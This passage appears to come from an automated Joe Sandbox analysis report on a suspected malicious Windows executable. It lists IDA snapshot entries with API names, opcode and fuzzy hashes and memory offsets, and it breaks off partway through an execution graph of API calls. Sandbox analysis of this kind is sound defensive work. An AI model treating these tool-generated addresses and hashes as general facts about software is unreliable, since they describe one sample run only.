                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2780335769-0
                                                                                                                                                                                                                                • Opcode ID: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
                                                                                                                                                                                                                                • Instruction ID: 91ef1a346178f1b4215449e647d744ae0f94e7b1c4b2e4dc143589f49324fc34
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6D514922E086458EFB10FFB1D4923BE27A1BB88B98F148935DE0D9B689DF38D4519740
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1956198572-0
                                                                                                                                                                                                                                • Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                • Instruction ID: a73301727956a14f1d39932d440ae04c9602998f35d50b685e71cc81e6548ac6
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7C110C21F0C54286F654B7A9E9D62799292FFC57C0F444030DF4947B9ECD3DE4D59210
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                                • String ID: ?
                                                                                                                                                                                                                                • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                                • Opcode ID: 21862b7f5a6063227688de7d7fc5fbfc7fa1fb1d7946118fe9e576ba790fa6aa
                                                                                                                                                                                                                                • Instruction ID: 09c06f490ac8816fbc27c8c6d1364462711493603c501fad9900685126725f33
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 21862b7f5a6063227688de7d7fc5fbfc7fa1fb1d7946118fe9e576ba790fa6aa
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A841F913A0CA82DAF764B725D5933796B90EF80BA4F144235EE5C86ADDDF3ED4418700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • _invalid_parameter_noinfo.LIBCMT ref: 00007FF644889046
                                                                                                                                                                                                                                  • Part of subcall function 00007FF64488A948: RtlFreeHeap.NTDLL(?,?,?,00007FF644892D22,?,?,?,00007FF644892D5F,?,?,00000000,00007FF644893225,?,?,?,00007FF644893157), ref: 00007FF64488A95E
                                                                                                                                                                                                                                  • Part of subcall function 00007FF64488A948: GetLastError.KERNEL32(?,?,?,00007FF644892D22,?,?,?,00007FF644892D5F,?,?,00000000,00007FF644893225,?,?,?,00007FF644893157), ref: 00007FF64488A968
                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF64487CBA5), ref: 00007FF644889064
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                                • String ID: C:\Users\user\Desktop\sB2ClgrGng.exe
                                                                                                                                                                                                                                • API String ID: 3580290477-2965912956
                                                                                                                                                                                                                                • Opcode ID: 136b352ca89953b7aac46d199a587659114d0cf60bae53edf27061cb20026a80
                                                                                                                                                                                                                                • Instruction ID: 32b3f3127922d3cd5c9320172619681a085a3b7bba5847fb0bf508917d675777
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 136b352ca89953b7aac46d199a587659114d0cf60bae53edf27061cb20026a80
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 23413936A0CA528EEB15BF2598C20B967A5EF45BD4B564035ED4E87B89DF3CE481C300
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                • String ID: U
                                                                                                                                                                                                                                • API String ID: 442123175-4171548499
                                                                                                                                                                                                                                • Opcode ID: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                                                                                                                                                                • Instruction ID: d46a9655ffac21e5b482143abb3de813be5387ae12781428e541197a31f20343
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FC418F22A1CA8189EB60BF25E4853AA67A1FBA8794F444135EE4DC7B9CEF3CD445C740
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CurrentDirectory
                                                                                                                                                                                                                                • String ID: :
                                                                                                                                                                                                                                • API String ID: 1611563598-336475711
                                                                                                                                                                                                                                • Opcode ID: 9aa1b1c0966d0181e71a7442aa19fd9d8a3a06258be719e39fc35e3b215e25b0
                                                                                                                                                                                                                                • Instruction ID: 325a810fdf6a7a7077d78a166e7dfaffa565f521c16f16e5947c9281b6c7cdb3
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9aa1b1c0966d0181e71a7442aa19fd9d8a3a06258be719e39fc35e3b215e25b0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6321D262A1C68189EB20FB11D48627D73A1FB88B44F464235DF8D83699DF7DE944CB41
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                                                • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                                • Opcode ID: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                                                                                                                                                                • Instruction ID: 187bd0a083416dd84e950d13af2fdb7fcfc2929a143ad516ae7646986dbf66de
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 03112E3261CB8186EB61AF16E8902597BE4FB88B88F588230DF8D47759DF3DD551C700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                                • String ID: :
                                                                                                                                                                                                                                • API String ID: 2595371189-336475711
                                                                                                                                                                                                                                • Opcode ID: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                                                                                                                                                                • Instruction ID: 3b94e68c8aa6fbeaffad1e9f2bcddb0b45d18847c0216af44ff3b419a800d7e8
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 97014F62A1CA02DEF720BF6094A727E63A0FF89754F840435DD4DC669AEF2EE5049B14

                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                Execution Coverage:2.5%
                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                Signature Coverage:1.1%
                                                                                                                                                                                                                                Total number of Nodes:897
                                                                                                                                                                                                                                Total number of Limit Nodes:44
                                                                                                                                                                                                                                execution_graph 77016 7ffdfaf30de0 77017 7ffdfaf30e0c 77016->77017 77026 7ffdfaf30e11 77016->77026 77029 7ffdfaf54a80 77017->77029 77019 7ffdfaf30f14 77020 7ffdfaf30f70 77019->77020 77021 7ffdfaf30f5a 77019->77021 77024 7ffdfaf30f18 77019->77024 77036 7ffdfaeda490 9 API calls 77020->77036 77035 7ffdfaeda490 9 API calls 77021->77035 77026->77019 77026->77024 77028 7ffdfaf30f01 77026->77028 77033 7ffdfaf6e2c0 10 API calls new[] 77026->77033 77028->77019 77034 7ffdfaf70140 13 API calls new[] 77028->77034 77030 7ffdfaf54aa5 77029->77030 77031 7ffdfaf54a99 77029->77031 77030->77026 77037 7ffdfaf549b0 77031->77037 77033->77028 77034->77019 77035->77024 77036->77024 77038 7ffdfaf549ea 77037->77038 77042 7ffdfaf549fa 77037->77042 77043 7ffdfaf544f0 77038->77043 77040 7ffdfaf54a4d 77040->77030 77041 7ffdfaf544f0 45 API calls 77041->77042 77042->77040 77042->77041 77075 7ffdfaf541f0 77043->77075 77045 7ffdfaf545da 77123 7ffdfb002bc0 77045->77123 77046 7ffdfaf545ac 77046->77045 77055 7ffdfaf54698 77046->77055 77059 7ffdfaf5467e 77046->77059 77106 7ffdfaef3750 77046->77106 77047 7ffdfaf5497b 77122 7ffdfaf31350 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 77047->77122 77051 7ffdfaf5499b 77051->77042 77053 7ffdfaf54634 77054 7ffdfaf5463a 77053->77054 77053->77055 77054->77059 77113 7ffdfaed6820 9 API calls new[] 77054->77113 77057 7ffdfaf5473d 77055->77057 77064 7ffdfaf54701 77055->77064 77114 7ffdfaed6820 9 API calls new[] 77057->77114 77058 7ffdfaf54667 77058->77059 77063 7ffdfaf5466f 00007FFE148D2010 77058->77063 77059->77045 77059->77047 77121 7ffdfaed6c20 9 API calls 77059->77121 77061 7ffdfaf5485c 77116 7ffdfaed9160 9 API calls 77061->77116 77062 7ffdfaf54816 77115 7ffdfaed6820 9 API calls new[] 77062->77115 77063->77059 77064->77061 77064->77062 77067 7ffdfaf54721 77064->77067 77067->77059 77120 7ffdfaef4b40 29 API calls 77067->77120 77068 7ffdfaf5489b 77117 7ffdfaf4d030 43 API calls new[] 77068->77117 77071 7ffdfaf548c7 77072 7ffdfaf548f5 77071->77072 77118 7ffdfaf2e560 44 API calls 77071->77118 77072->77067 77119 7ffdfaf313e0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 77072->77119 77076 7ffdfaf54212 77075->77076 77077 7ffdfaf544a4 77075->77077 77078 7ffdfaf54233 77076->77078 77079 7ffdfaf5421b 77076->77079 77077->77046 77083 7ffdfaf54272 77078->77083 77091 7ffdfaf54423 77078->77091 77130 7ffdfaf540e0 9 API calls 77079->77130 77081 7ffdfaf54226 77081->77046 77084 7ffdfaf542c4 77083->77084 77131 7ffdfaf540e0 9 API calls 77083->77131 77132 7ffdfaf54d90 77084->77132 77087 7ffdfaf54333 77087->77077 77088 7ffdfaf54378 77087->77088 77097 7ffdfaf543c2 77087->77097 77169 7ffdfaed9330 9 API calls 77088->77169 77091->77077 77173 7ffdfaf540e0 9 API calls 77091->77173 77092 7ffdfaf5432b 77166 7ffdfaed6c20 9 API calls 77092->77166 77093 7ffdfaf54335 77093->77087 77167 7ffdfaf93d30 11 API calls 77093->77167 77094 7ffdfaf54389 77170 7ffdfaed9330 9 API calls 77094->77170 77171 7ffdfaf05960 38 API calls 77097->77171 77099 7ffdfaf543b3 77099->77046 77101 7ffdfaf54346 77168 7ffdfaf540e0 9 API calls 77101->77168 77103 7ffdfaf543ee 77172 7ffdfaf92470 29 API calls 77103->77172 77105 7ffdfaf54414 77105->77046 77108 7ffdfaef3787 77106->77108 77107 7ffdfaef37e9 77107->77053 77108->77107 77212 7ffdfaef3330 77108->77212 77221 7ffdfaeea600 RaiseException IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 77108->77221 77222 7ffdfaef3680 9 API calls 77108->77222 77223 7ffdfaee7220 19 API calls 77108->77223 77113->77058 77114->77067 77115->77067 77116->77068 77117->77071 77118->77072 77119->77067 77120->77059 77121->77047 77122->77045 77124 7ffdfb002bc9 77123->77124 77125 7ffdfb002bd4 77124->77125 77126 7ffdfb002c14 IsProcessorFeaturePresent 77124->77126 77125->77051 77127 7ffdfb002c2c 77126->77127 77273 7ffdfb002e0c RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 77127->77273 77129 7ffdfb002c3f 77129->77051 77130->77081 77131->77084 77133 7ffdfaf54e04 77132->77133 77134 7ffdfaf54e7f 77133->77134 77150 7ffdfaf54e9d 77133->77150 77186 7ffdfaeda490 9 API calls 77134->77186 77136 7ffdfaf5505b 77174 7ffdfaf8fe10 77136->77174 77137 7ffdfaf54f97 77137->77136 77138 7ffdfaf54fca 77137->77138 77141 7ffdfaf54fd3 77138->77141 77142 7ffdfaf54ffb 77138->77142 77140 7ffdfb002bc0 4 API calls 77143 7ffdfaf54302 77140->77143 77188 7ffdfaeda300 11 API calls 77141->77188 77146 7ffdfaf55034 77142->77146 77189 7ffdfaed6820 9 API calls new[] 77142->77189 77143->77087 77143->77092 77143->77093 77161 7ffdfaf550da 77146->77161 77190 7ffdfaed6820 9 API calls new[] 77146->77190 77147 7ffdfaf5500c 77147->77146 77149 7ffdfaf55014 00007FFE148D2010 77147->77149 77148 7ffdfaf550ee 77152 7ffdfaf55245 77148->77152 77194 7ffdfaf059f0 38 API calls 77148->77194 77151 7ffdfaf8fe10 9 API calls 77149->77151 77150->77137 77155 7ffdfaf54f72 77150->77155 77151->77146 77153 7ffdfaf54e90 77152->77153 77195 7ffdfaeda300 11 API calls 77152->77195 77153->77140 77187 7ffdfaeda300 11 API calls 77155->77187 77159 7ffdfaf550bd 77160 7ffdfaf550c5 00007FFE148D2010 77159->77160 77159->77161 77160->77161 77161->77148 77161->77153 77162 7ffdfaef3750 21 API calls 77161->77162 77191 7ffdfaed6c20 9 API calls 77161->77191 77192 7ffdfaf31350 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 77161->77192 77193 7ffdfaef4b40 29 API calls 77161->77193 77162->77161 77166->77087 77167->77101 77168->77087 77169->77094 77170->77099 77171->77103 77172->77105 77173->77077 77176 7ffdfaf8fe61 77174->77176 77177 7ffdfaf9016e 77176->77177 77179 7ffdfaf90229 77176->77179 77196 7ffdfaf8f280 77176->77196 77182 7ffdfaf90280 77177->77182 77185 7ffdfaf9029d 77177->77185 77207 7ffdfaed9160 9 API calls 77177->77207 77206 7ffdfaeda490 9 API calls 77179->77206 77208 7ffdfaed9330 9 API calls 77182->77208 77183 7ffdfb002bc0 4 API calls 77184 7ffdfaf903e0 77183->77184 77184->77146 77185->77183 77186->77153 77187->77153 77188->77153 77189->77147 77190->77159 77191->77161 77192->77161 77193->77161 77194->77152 77195->77153 77197 7ffdfaf8f2c3 77196->77197 77198 7ffdfaf8f39b 77197->77198 77199 7ffdfaf8f3dd 77197->77199 77205 7ffdfaf8f3b9 77198->77205 77209 7ffdfaf8c450 9 API calls 77198->77209 77201 7ffdfaf8f410 77199->77201 77202 7ffdfaf8f423 77199->77202 77199->77205 77210 7ffdfaeda490 9 API calls 77201->77210 77211 7ffdfaeda490 9 API calls 77202->77211 77205->77176 77206->77177 77207->77182 77208->77185 77209->77205 77210->77205 77211->77205 77224 7ffdfaee9cb0 77212->77224 77215 7ffdfaef351d 77218 7ffdfaef3464 77215->77218 77246 7ffdfaee7220 19 API calls 77215->77246 77216 7ffdfaef3362 77216->77215 77216->77218 77245 7ffdfaf95c30 9 API calls 77216->77245 77218->77108 77221->77108 77222->77108 77223->77108 77228 7ffdfaee9e75 77224->77228 77232 7ffdfaee9ce0 77224->77232 77226 7ffdfb002bc0 4 API calls 77227 7ffdfaeea069 77226->77227 77227->77218 77234 7ffdfaeea080 77227->77234 77229 7ffdfaee9d71 77228->77229 77249 7ffdfaeeebe0 12 API calls 77228->77249 77229->77226 77230 7ffdfaee9e32 77230->77228 77230->77229 77248 7ffdfaee7c40 11 API calls 77230->77248 77232->77228 77232->77229 77232->77230 77247 7ffdfaf95c70 9 API calls 77232->77247 77235 7ffdfaeea0a2 77234->77235 77237 7ffdfaeea0d5 77234->77237 77256 7ffdfaed9330 9 API calls 77235->77256 77238 7ffdfaeea1f8 77237->77238 77240 7ffdfaeea250 77237->77240 77243 7ffdfaeea0ce 77237->77243 77244 7ffdfaeea10d 77237->77244 77257 7ffdfaed9330 9 API calls 77238->77257 77240->77244 77250 7ffdfaee8000 77240->77250 77243->77216 77244->77243 77258 7ffdfaee7220 19 API calls 77244->77258 77245->77215 77246->77218 77247->77230 77248->77228 77249->77229 77251 7ffdfaee803c 77250->77251 77252 7ffdfaee802f 77250->77252 77254 7ffdfaee804c 77251->77254 77259 7ffdfaedd970 77251->77259 77270 7ffdfaeeef40 10 API calls 77252->77270 77254->77244 77256->77243 77257->77244 77258->77243 77260 7ffdfaedd99d 77259->77260 77269 7ffdfaedd9eb 77259->77269 77261 7ffdfaedd9d4 00007FFE148D2010 77260->77261 77262 7ffdfaedd9b4 00007FFE148D2010 77260->77262 77261->77269 77268 7ffdfaedd9b9 77262->77268 77263 7ffdfaedda14 ReadFile 77264 7ffdfaeddaaa 77263->77264 77263->77269 77264->77268 77272 7ffdfaed9330 9 API calls 77264->77272 77266 7ffdfaedda84 77271 7ffdfaedd7a0 13 API calls 77266->77271 77268->77254 77269->77263 77269->77264 77269->77266 77270->77251 77271->77268 77272->77268 77273->77129 77385 7ff64487cc3c 77406 7ff64487ce0c 77385->77406 77388 7ff64487cd88 77557 7ff64487d12c 7 API calls 2 library calls 77388->77557 77389 7ff64487cc58 __scrt_acquire_startup_lock 77391 7ff64487cd92 77389->77391 77396 7ff64487cc76 __scrt_release_startup_lock 77389->77396 77558 7ff64487d12c 7 API calls 2 library calls 77391->77558 77393 7ff64487cc9b 77394 7ff64487cd9d _CallSETranslator 77395 7ff64487cd21 77412 7ff64487d274 77395->77412 77396->77393 77396->77395 77554 7ff644889b2c 45 API calls 77396->77554 77398 7ff64487cd26 77415 7ff644871000 77398->77415 77403 7ff64487cd49 77403->77394 77556 7ff64487cf90 7 API calls 77403->77556 77405 7ff64487cd60 77405->77393 77407 7ff64487ce14 77406->77407 77408 7ff64487ce20 __scrt_dllmain_crt_thread_attach 77407->77408 77409 7ff64487cc50 77408->77409 77410 7ff64487ce2d 77408->77410 77409->77388 77409->77389 77410->77409 77559 7ff64487d888 7 API calls 2 library calls 77410->77559 77560 7ff64489a4d0 77412->77560 77414 7ff64487d28b GetStartupInfoW 77414->77398 77416 7ff644871009 77415->77416 77562 7ff644885484 77416->77562 77418 7ff6448737fb 77569 7ff6448736b0 77418->77569 77425 7ff64487383c 77668 7ff644871c80 77425->77668 77426 7ff64487391b 77673 7ff6448745c0 77426->77673 77430 7ff64487385b 77641 7ff644878830 77430->77641 77431 7ff64487396a 77696 7ff644872710 54 API calls _log10_special 77431->77696 77435 7ff64487388e 77442 7ff6448738bb __std_exception_destroy 77435->77442 77672 7ff6448789a0 40 API calls __std_exception_destroy 77435->77672 77436 7ff64487395d 77437 7ff644873984 77436->77437 77438 7ff644873962 77436->77438 77440 7ff644871c80 49 API calls 77437->77440 77692 7ff64488004c 77438->77692 77443 7ff6448739a3 77440->77443 77444 7ff644878830 14 API calls 77442->77444 77452 7ff6448738de __std_exception_destroy 77442->77452 77448 7ff644871950 115 API calls 77443->77448 77444->77452 77446 7ff644873a0b 77699 7ff6448789a0 40 API calls __std_exception_destroy 77446->77699 77450 7ff6448739ce 77448->77450 77449 7ff644873a17 77700 7ff6448789a0 40 API calls __std_exception_destroy 77449->77700 77450->77430 77451 7ff6448739de 77450->77451 77697 7ff644872710 54 API calls _log10_special 77451->77697 77457 7ff64487390e __std_exception_destroy 77452->77457 77698 7ff644878940 40 API calls __std_exception_destroy 77452->77698 77455 7ff644873a23 77701 7ff6448789a0 40 API calls __std_exception_destroy 77455->77701 77458 7ff644878830 14 API calls 77457->77458 77459 7ff644873a3b 77458->77459 77460 7ff644873b2f 77459->77460 77461 7ff644873a60 __std_exception_destroy 77459->77461 77703 7ff644872710 54 API calls _log10_special 77460->77703 77472 7ff644873aab 77461->77472 77702 7ff644878940 40 API calls __std_exception_destroy 77461->77702 77463 7ff644873808 __std_exception_destroy 77706 7ff64487c550 77463->77706 77465 7ff644878830 14 API calls 77466 7ff644873bf4 __std_exception_destroy 77465->77466 77467 7ff644873c46 77466->77467 77468 7ff644873d41 77466->77468 77469 7ff644873cd4 77467->77469 77470 7ff644873c50 77467->77470 77717 7ff6448744e0 49 API calls 77468->77717 77474 7ff644878830 14 API calls 77469->77474 77704 7ff6448790e0 59 API calls _log10_special 77470->77704 77472->77465 77477 7ff644873ce0 77474->77477 77475 7ff644873d4f 77478 7ff644873d65 77475->77478 77479 7ff644873d71 77475->77479 77476 7ff644873c55 77480 7ff644873cb3 77476->77480 77481 7ff644873c61 77476->77481 77477->77481 77485 7ff644873ced 77477->77485 77718 7ff644874630 77478->77718 77483 7ff644871c80 49 API calls 77479->77483 77715 7ff644878660 86 API calls 2 library calls 77480->77715 77705 7ff644872710 54 API calls _log10_special 77481->77705 77496 7ff644873d2b __std_exception_destroy 77483->77496 77488 7ff644871c80 49 API calls 77485->77488 77486 7ff644873cbb 77491 7ff644873cc8 77486->77491 77492 7ff644873cbf 77486->77492 77493 7ff644873d0b 77488->77493 77489 7ff644873dbc 77654 7ff644879390 77489->77654 77491->77496 77492->77481 77493->77496 77497 7ff644873d12 77493->77497 77494 7ff644873da7 LoadLibraryExW 77494->77489 77495 7ff644873dcf SetDllDirectoryW 77500 7ff644873e02 77495->77500 77544 7ff644873e52 77495->77544 77496->77489 77496->77494 77716 7ff644872710 54 API calls _log10_special 77497->77716 77502 7ff644878830 14 API calls 77500->77502 77501 7ff644874000 77504 7ff64487402d 77501->77504 77505 7ff64487400a PostMessageW GetMessageW 77501->77505 77508 7ff644873e0e __std_exception_destroy 77502->77508 77503 7ff644873f13 77729 7ff6448733c0 121 API calls 2 library calls 77503->77729 77659 7ff644873360 77504->77659 77505->77504 77507 7ff644873f1b 77507->77463 77509 7ff644873f23 77507->77509 77511 7ff644873eea 77508->77511 77515 7ff644873e46 